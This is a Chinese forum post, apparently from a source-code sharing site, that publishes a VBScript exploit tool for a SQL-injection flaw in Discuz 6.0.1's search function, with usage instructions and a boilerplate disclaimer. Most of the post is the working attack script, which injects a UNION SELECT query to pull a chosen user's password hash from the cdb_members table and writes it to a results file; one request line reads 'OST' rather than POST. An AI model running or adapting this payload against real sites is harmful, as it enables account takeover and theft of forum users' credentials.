找回密码
 立即注册
查看: 83|回复: 0

discuz 任意管理员密码漏洞利用工具 vbs代码

[复制链接]
  • TA的每日心情
    开心
    5 天前
  • 签到天数: 62 天

    [LV.6]常住居民II

    200

    主题

    18

    回帖

    2553

    积分

    管理员

    积分
    2553
    发表于 2024-12-13 12:12:34 | 显示全部楼层 |阅读模式
    也利于修改
    以下是search.inc.php 文件漏洞利用代码VBS版

    Dim strUrl,strSite,strPath,strUid
    showB()
    Set Args = Wscript.Arguments
    If Args.Count <> 3 Then
    ShowU()
    Else
    strSite=Args(0)
    strPath=Args(1)
    strUid=Args(2)
    End If
    strUrl="action=search&searchid=22%cf' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" & strUid &"/*&do=submit"
    Set objXML = CreateObject("Microsoft.XMLHTTP")
    objXML.Open "OST",strSite & strPath & "index.php", False
    objXML.SetRequestHeader "Accept", "*/*"
    objXML.SetRequestHeader "Accept-Language", "zh-cn"
    objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"
    objXML.SetRequestHeader "User-Agent", "wap"
    objXML.send(strUrl)
    wscript.echo(objXML.ResponseText)
    Sub showB()
    With Wscript
    .Echo("+--------------------------=====================------------------------------+")
    .Echo("Exploit discuz6.0.1")
    .Echo("Code By Safe3")
    .Echo("+--------------------------=====================------------------------------+")
    End with
    End Sub
    Sub showU()
    With Wscript
    .Echo("+--------------------------=====================------------------------------+")
    .Echo("用法:")
    .Echo(" cscript "&.ScriptName&" site path uid")
    .Echo("例子:")
    .Echo(" cscript "&.ScriptName&" http://www.example.com/ /forum/ 1 >result.txt")
    .Echo("+--------------------------=====================------------------------------+")
    .Quit
    End with
    End Sub

    获得的密码大家自己在result.txt中查找
    来源:互联网
    免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    QQ|Archiver|手机版|小黑屋|软媒源码阁 |网站地图

    GMT+8, 2025-5-14 03:38 , Processed in 0.070132 second(s), 22 queries .

    Powered by RuanmeiHome X3.5

    Copyright © 2014-2025, 软媒源码阁

    快速回复 返回顶部 返回列表